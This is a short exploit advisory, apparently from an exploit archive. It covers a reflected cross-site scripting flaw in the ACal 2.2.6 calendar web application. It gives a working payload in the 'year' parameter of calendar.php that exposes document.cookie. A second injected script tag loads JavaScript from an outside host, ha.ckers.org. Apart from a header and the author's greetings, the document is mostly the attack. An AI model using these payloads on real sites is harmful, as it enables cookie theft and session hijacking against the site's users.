================================================================= =ACal-2.2.6 XSS Vulnerability ================================================================= # Exploit Title: ACal-2.2.6 XSS Vulnerability # Date: 02.09.2011 # Author: T0xic # Category: webapps/0day # Script url: http://acalproj.sourceforge.net/ # Version: N/A # Tested on: # CVE : [ EXPL0!T ] => http://www.example.com/calendar/calendar.php?year=<script>alert(document.cookie)</script> Exemple exploit code : => ?><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT><? #================[ Exploited By T0xic ]================ #Greets To : Dz Offenders Cr3w < Algerians HaCkerS > = #======================================================